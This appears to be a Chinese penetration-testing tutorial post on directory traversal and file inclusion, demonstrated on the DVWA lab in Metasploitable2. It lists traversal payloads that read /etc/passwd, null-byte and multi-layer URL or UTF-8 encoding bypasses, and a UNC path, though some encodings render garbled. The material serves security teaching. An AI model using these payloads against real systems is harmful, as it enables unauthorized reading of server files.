Web渗透测试_目录遍历

Directory traversal / File include

本次以Metasploitable2的dvwa进行演示

  • 目录权限限制不严 / 文件包含

  • /etc/php5/cgi/php.ini(修改这个文件来演示远程文件包含漏洞)

  • allow_url_include = on

图片

  • 应用程序功能操作文件,限制不严时导致访问WEB目录以外的文件

  • 读、写文件、远程执行代码

  • 特征(不决定)

  • ?page=a.php

  • ?home=b.html

  • ?file=content

经典测试方法

  • ?file=…/…/…/…/…/…/…/…/…/etc/passwd

图片

图片

  • 编码绕过字符过滤

  • “.” “%00” 绕过文件扩展名过滤

  • ?file=a.doc%00.php

  • 使用多种编码尝试

不同操作系统的路径特征字符

  • 类unix系统

  • 根目录:/

  • 目录层级分隔符:/

  • windows系统:C:\

编码

  • url编码、双层url编码

  • %2e%2e%2f 解码:…/

  • %2e%2e%5c 解码:…\

  • %252e%252e%252c 解码:…\

  • Unicode/UTF-8 编码

  • …%c0%af 解码:…/

  • …%u2216

  • …%c1%9c 解码:…\

其他系统路径可能使用到的字符

  • 其他系统路径可能使用到的字符

  • file.txt…

  • file.txt

  • file.txt’‘’‘’‘’’

  • file.txt<<<>>>><

  • ./././file.txt

  • nonexistant/…/file.txt

  • UNC路径

\\1.1.1.1\path\to\file.txt
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值